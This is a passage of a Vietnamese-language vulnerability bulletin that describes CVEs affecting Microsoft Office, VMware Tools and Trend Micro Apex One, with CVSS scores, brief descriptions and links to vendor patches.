Microsoft 365 Apps for Enterprise for 32-bit Systems

Microsoft Office 2019 for Mac

Microsoft Office 2019 for 64-bit editions

Microsoft Office 2019 for 32-bit editions

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37962

3.2   Ứng dụng web và các sản phẩm khác

3.2.1    CVE-2022-31676 – Local privilege escalation vulnerability

CVSS v3: 7.0/10

Mô tả: Vmware Tools tồn tại lổ hỗng cho phép kẻ tấn công leo thang đặc quyền lên quyền root

Sản phẩm ảnh hưởng: Vmware Tools

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://www.vmware.com/security/advisories/VMSA-2022-0024.html

3.2.2   CVE-2022-40139:  Improper Validation of Rollback Mechanism Components RCE Vulnerability

CVSS v3: 7.2/10

Mô tả: Lỗ hổng tồn tại trong quá trình xác thực một số thành phần trong cơ chế rollback. Kẻ tấn công có thể tải xuống các rollback package độc hại dẫn tới thực thi mã từ xa

Sản phẩm ảnh hưởng: Trend Micro Apex One và Trend Micro Apex One as a Service

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://success.trendmicro.com/dcx/s/solution/000291528?language=en_US